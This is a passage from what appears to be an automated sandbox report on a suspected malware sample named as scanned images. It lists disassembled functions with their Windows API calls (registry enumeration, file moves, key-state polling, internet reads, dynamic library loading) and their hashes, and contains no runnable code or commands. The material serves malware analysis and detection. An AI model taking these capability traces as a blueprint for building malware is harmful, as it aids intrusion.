                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: File$Delete$Copy
                                                                                • String ID:
                                                                                • API String ID: 3226157194-0
                                                                                • Opcode ID: a26b44a963addafbf23043b38295ec1bb2fb3d4607db718e5b1a1a725b60bfb6
                                                                                • Instruction ID: 1d3678c79605a83571f4095e746ea91141dc5ac6b2a73ca7d87cf5b56c946261
                                                                                • Opcode Fuzzy Hash: a26b44a963addafbf23043b38295ec1bb2fb3d4607db718e5b1a1a725b60bfb6
                                                                                • Instruction Fuzzy Hash: 95B16F75D00119ABDF11DFA5CD85EEEBB7DEF08314F0040ABFA09E6141EAB89A448F65
                                                                                Function 004DA387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCurrentProcessId.KERNEL32 ref: 004DA427
                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 004DA435
                                                                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 004DA468
                                                                                • CloseHandle.KERNEL32(?), ref: 004DA63D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                • String ID:
                                                                                • API String ID: 3488606520-0
                                                                                • Opcode ID: 74a0f5c7fd617eb46eb9ecbc5e500c10d7b58348ac4fec99156651eb6ba6e3a8
                                                                                • Instruction ID: 5cc2542883f451fd78208666819e5163888eca5478cb5aa47287c4518f9d953a
                                                                                • Opcode Fuzzy Hash: 74a0f5c7fd617eb46eb9ecbc5e500c10d7b58348ac4fec99156651eb6ba6e3a8
                                                                                • Instruction Fuzzy Hash: 95A1A171604300AFD720DF25D892B2AB7E1AF84718F14885EF9999B3D2DB74EC45CB86
                                                                                Function 004BE3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 004BDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,004BCF22,?), ref: 004BDDFD
                                                                                  • Part of subcall function 004BDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,004BCF22,?), ref: 004BDE16
                                                                                  • Part of subcall function 004BE199: GetFileAttributesW.KERNEL32(?,004BCF95), ref: 004BE19A
                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 004BE473
                                                                                • MoveFileW.KERNEL32(?,?), ref: 004BE4AC
                                                                                • _wcslen.LIBCMT ref: 004BE5EB
                                                                                • _wcslen.LIBCMT ref: 004BE603
                                                                                • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 004BE650
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                • String ID:
                                                                                • API String ID: 3183298772-0
                                                                                • Opcode ID: de29c65b8caffd267e82e24e39eb8bd01f2b2a9946fb14cc57e461e5763d3fe9
                                                                                • Instruction ID: 63a997946a9391f2d5726b5e574654bff86630157ad568f1c5bde9c77e6066b1
                                                                                • Opcode Fuzzy Hash: de29c65b8caffd267e82e24e39eb8bd01f2b2a9946fb14cc57e461e5763d3fe9
                                                                                • Instruction Fuzzy Hash: FB5151B24083859BC724EBA5DC819DB73DCAFC4344F00492FF68993152EF78A588876E
                                                                                Function 004DB9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00459CB3: _wcslen.LIBCMT ref: 00459CBD
                                                                                  • Part of subcall function 004DC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,004DB6AE,?,?), ref: 004DC9B5
                                                                                  • Part of subcall function 004DC998: _wcslen.LIBCMT ref: 004DC9F1
                                                                                  • Part of subcall function 004DC998: _wcslen.LIBCMT ref: 004DCA68
                                                                                  • Part of subcall function 004DC998: _wcslen.LIBCMT ref: 004DCA9E
                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004DBAA5
                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004DBB00
                                                                                • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 004DBB63
                                                                                • RegCloseKey.ADVAPI32(?,?), ref: 004DBBA6
                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 004DBBB3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                • String ID:
                                                                                • API String ID: 826366716-0
                                                                                • Opcode ID: e1628b72971712476fd4212b9bce7d1329d49797e8677d179404d2256214b1d2
                                                                                • Instruction ID: bdab7a8a5ced6753931f5f6ab87d2e75d7851e0a5f23e812f40c9d0b98d3cbea
                                                                                • Opcode Fuzzy Hash: e1628b72971712476fd4212b9bce7d1329d49797e8677d179404d2256214b1d2
                                                                                • Instruction Fuzzy Hash: 0A616A31208241EFC714DF14C8A0E2ABBE5EF84308F55895EF4994B3A2DB35ED46CB96
                                                                                Function 004B8BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VariantInit.OLEAUT32(?), ref: 004B8BCD
                                                                                • VariantClear.OLEAUT32 ref: 004B8C3E
                                                                                • VariantClear.OLEAUT32 ref: 004B8C9D
                                                                                • VariantClear.OLEAUT32(?), ref: 004B8D10
                                                                                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 004B8D3B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$Clear$ChangeInitType
                                                                                • String ID:
                                                                                • API String ID: 4136290138-0
                                                                                • Opcode ID: e774bcc6e902446e2baa4ec44179fd0c09f7227e9c2debf2e9b3e86da5a7c0ae
                                                                                • Instruction ID: ecf6d840093819321dd23be7e7e914885e58e0fcc7c0324841140a935cd3cdbe
                                                                                • Opcode Fuzzy Hash: e774bcc6e902446e2baa4ec44179fd0c09f7227e9c2debf2e9b3e86da5a7c0ae
                                                                                • Instruction Fuzzy Hash: DA516DB5A00219DFCB10CF68D894AEAB7F8FF89314B15855AE905DB350D734E911CFA4
                                                                                Function 004C8AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 004C8BAE
                                                                                • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 004C8BDA
                                                                                • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 004C8C32
                                                                                • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 004C8C57
                                                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 004C8C5F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: PrivateProfile$SectionWrite$String
                                                                                • String ID:
                                                                                • API String ID: 2832842796-0
                                                                                • Opcode ID: 102c9dc33981500758902bf9e70a1df3b2b5c09c0b807f12f90ca61bfb347e13
                                                                                • Instruction ID: 85c21d943059fe8e9ec827d25a267736269a1d59acd70e6db482de317d0ed2f0
                                                                                • Opcode Fuzzy Hash: 102c9dc33981500758902bf9e70a1df3b2b5c09c0b807f12f90ca61bfb347e13
                                                                                • Instruction Fuzzy Hash: AA515E35A00218AFCB00DF65C880E6ABBF5FF49318F08805DE849AB362DB35ED55CB94
                                                                                Function 004D8EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryW.KERNEL32(?,00000000,?), ref: 004D8F40
                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 004D8FD0
                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 004D8FEC
                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 004D9032
                                                                                • FreeLibrary.KERNEL32(00000000), ref: 004D9052
                                                                                  • Part of subcall function 0046F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,004C1043,?,753CE610), ref: 0046F6E6
                                                                                  • Part of subcall function 0046F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,004AFA64,00000000,00000000,?,?,004C1043,?,753CE610,?,004AFA64), ref: 0046F70D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                • String ID:
                                                                                • API String ID: 666041331-0
                                                                                • Opcode ID: f20ce0b3ad84bd9f26a50a2a66d97ab827ca944476637c7770a2e54eff240443
                                                                                • Instruction ID: 7fbab859300cd13ae53c770948070849a22851b18b1289be4fd270603c644078
                                                                                • Opcode Fuzzy Hash: f20ce0b3ad84bd9f26a50a2a66d97ab827ca944476637c7770a2e54eff240443
                                                                                • Instruction Fuzzy Hash: EF513B35600205DFC715EF69C4948ADBBF1FF49318B0480AEE8459B362DB35ED8ACB95
                                                                                Function 004E6B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetWindowLongW.USER32(00000002,000000F0,?), ref: 004E6C33
                                                                                • SetWindowLongW.USER32(?,000000EC,?), ref: 004E6C4A
                                                                                • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 004E6C73
                                                                                • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,004CAB79,00000000,00000000), ref: 004E6C98
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 004E6CC7
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Long$MessageSendShow
                                                                                • String ID:
                                                                                • API String ID: 3688381893-0
                                                                                • Opcode ID: 6e71ccd5161b84b954db03eb2ffb974cb24345a01f97387eaad83ee5528fb7fd
                                                                                • Instruction ID: bfb77c1cb84d3236f08036cf6894c5b0378bcbdbcb1f11f78f24bded373ac0ce
                                                                                • Opcode Fuzzy Hash: 6e71ccd5161b84b954db03eb2ffb974cb24345a01f97387eaad83ee5528fb7fd
                                                                                • Instruction Fuzzy Hash: 7841F935600194AFD724CF3ACC84FA67BA4EB19391F26022AFD95A73E1C375ED41C648
                                                                                Function 00482051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: _free
                                                                                • String ID:
                                                                                • API String ID: 269201875-0
                                                                                • Opcode ID: 1fef0180453f7d1c2559ad33661ded7db70e6717977578823f1919f88c90a950
                                                                                • Instruction ID: fd6a5681b5c7c79d6da7d692cca0f36eeafa61d7de45f9f72ed8165d60f7c1b0
                                                                                • Opcode Fuzzy Hash: 1fef0180453f7d1c2559ad33661ded7db70e6717977578823f1919f88c90a950
                                                                                • Instruction Fuzzy Hash: 56410472A002009FCB20EF79C984A5EB7E1EF89314F25896AE615EB391D775ED01CB85
                                                                                Function 0046912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCursorPos.USER32(?), ref: 00469141
                                                                                • ScreenToClient.USER32(00000000,?), ref: 0046915E
                                                                                • GetAsyncKeyState.USER32(00000001), ref: 00469183
                                                                                • GetAsyncKeyState.USER32(00000002), ref: 0046919D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: AsyncState$ClientCursorScreen
                                                                                • String ID:
                                                                                • API String ID: 4210589936-0
                                                                                • Opcode ID: 3478a9299a0400a2eed0ee24435310c49e5c76b539e1031caa54568332d8e43e
                                                                                • Instruction ID: cdfde70832719423e881d976feb25c9ef5b055336dd6999a764fda51193bcd94
                                                                                • Opcode Fuzzy Hash: 3478a9299a0400a2eed0ee24435310c49e5c76b539e1031caa54568332d8e43e
                                                                                • Instruction Fuzzy Hash: AC419271A0821AFBDF159F64C844BEEB7B8FB06324F20422AE425A73D0D7785D51CB96
                                                                                Function 004C3874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetInputState.USER32 ref: 004C38CB
                                                                                • TranslateAcceleratorW.USER32(?,00000000,?), ref: 004C3922
                                                                                • TranslateMessage.USER32(?), ref: 004C394B
                                                                                • DispatchMessageW.USER32(?), ref: 004C3955
                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004C3966
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                • String ID:
                                                                                • API String ID: 2256411358-0
                                                                                • Opcode ID: 104c0fa2dc836efaa6a81ebadec3bb35c61cb9ae4df5245077574903169a7117
                                                                                • Instruction ID: 128dba720f2c012306bb89ab16eb5a02edd89244321442b01e2dfc4ddc3fff4a
                                                                                • Opcode Fuzzy Hash: 104c0fa2dc836efaa6a81ebadec3bb35c61cb9ae4df5245077574903169a7117
                                                                                • Instruction Fuzzy Hash: 9E31DDB45047829EEB75CF349848F7737E4AF26305F04856FD45286290D3B89686DB1D
                                                                                Function 004CCF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,004CC21E,00000000), ref: 004CCF38
                                                                                • InternetReadFile.WININET(?,00000000,?,?), ref: 004CCF6F
                                                                                • GetLastError.KERNEL32(?,00000000,?,?,?,004CC21E,00000000), ref: 004CCFB4
                                                                                • SetEvent.KERNEL32(?,?,00000000,?,?,?,004CC21E,00000000), ref: 004CCFC8
                                                                                • SetEvent.KERNEL32(?,?,00000000,?,?,?,004CC21E,00000000), ref: 004CCFF2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                • String ID:
                                                                                • API String ID: 3191363074-0
                                                                                • Opcode ID: 869010d13b13afa1f4467826879f145fda68b079195a53fccdfa5bcbb8e3f166
                                                                                • Instruction ID: 119fe2d349f9660806af13827b9fde6e761ac7533c6815b27c1fbec909cf7b53
                                                                                • Opcode Fuzzy Hash: 869010d13b13afa1f4467826879f145fda68b079195a53fccdfa5bcbb8e3f166
                                                                                • Instruction Fuzzy Hash: 2A317F75900205EFDB60DFA5D8C4EABBBFAEB04314B10446FF51AD6281E738ED419B68
                                                                                Function 004B1901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetWindowRect.USER32(?,?), ref: 004B1915
                                                                                • PostMessageW.USER32(00000001,00000201,00000001), ref: 004B19C1
                                                                                • Sleep.KERNEL32(00000000,?,?,?), ref: 004B19C9
                                                                                • PostMessageW.USER32(00000001,00000202,00000000), ref: 004B19DA
                                                                                • Sleep.KERNEL32(00000000,?,?,?,?), ref: 004B19E2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePostSleep$RectWindow
                                                                                • String ID:
                                                                                • API String ID: 3382505437-0
                                                                                • Opcode ID: 67647ae661e3c0c6b2b84be084d0523a5484a931b2d2706a35ba93faf3bf7964
                                                                                • Instruction ID: 9368e60f4f09f495132916533d0570b387f17596fcdec7215b8e49cb85f6accc
                                                                                • Opcode Fuzzy Hash: 67647ae661e3c0c6b2b84be084d0523a5484a931b2d2706a35ba93faf3bf7964
                                                                                • Instruction Fuzzy Hash: D431E4B1900259EFCB00CFA8CD98ADF7BB5EB04314F004226F921AB2E1C3749945CBA4
                                                                                Function 004E5706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00001053,000000FF,?), ref: 004E5745
                                                                                • SendMessageW.USER32(?,00001074,?,00000001), ref: 004E579D
                                                                                • _wcslen.LIBCMT ref: 004E57AF
                                                                                • _wcslen.LIBCMT ref: 004E57BA
                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 004E5816
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$_wcslen
                                                                                • String ID:
                                                                                • API String ID: 763830540-0
                                                                                • Opcode ID: f48b3f32c8712dc6baeb0e99f95086b8939aa30007cf6f005f97a126d235ee90
                                                                                • Instruction ID: 39f4cdc8676a8866c38746a5e6007f17acded086a638ff7449b73bbfa28464a1
                                                                                • Opcode Fuzzy Hash: f48b3f32c8712dc6baeb0e99f95086b8939aa30007cf6f005f97a126d235ee90
                                                                                • Instruction Fuzzy Hash: 9821A7719046989ADB20DF62CC84AEE7778FF04329F108217E919DB2C1D7748985CF59
                                                                                Function 004D0930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • IsWindow.USER32(00000000), ref: 004D0951
                                                                                • GetForegroundWindow.USER32 ref: 004D0968
                                                                                • GetDC.USER32(00000000), ref: 004D09A4
                                                                                • GetPixel.GDI32(00000000,?,00000003), ref: 004D09B0
                                                                                • ReleaseDC.USER32(00000000,00000003), ref: 004D09E8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ForegroundPixelRelease
                                                                                • String ID:
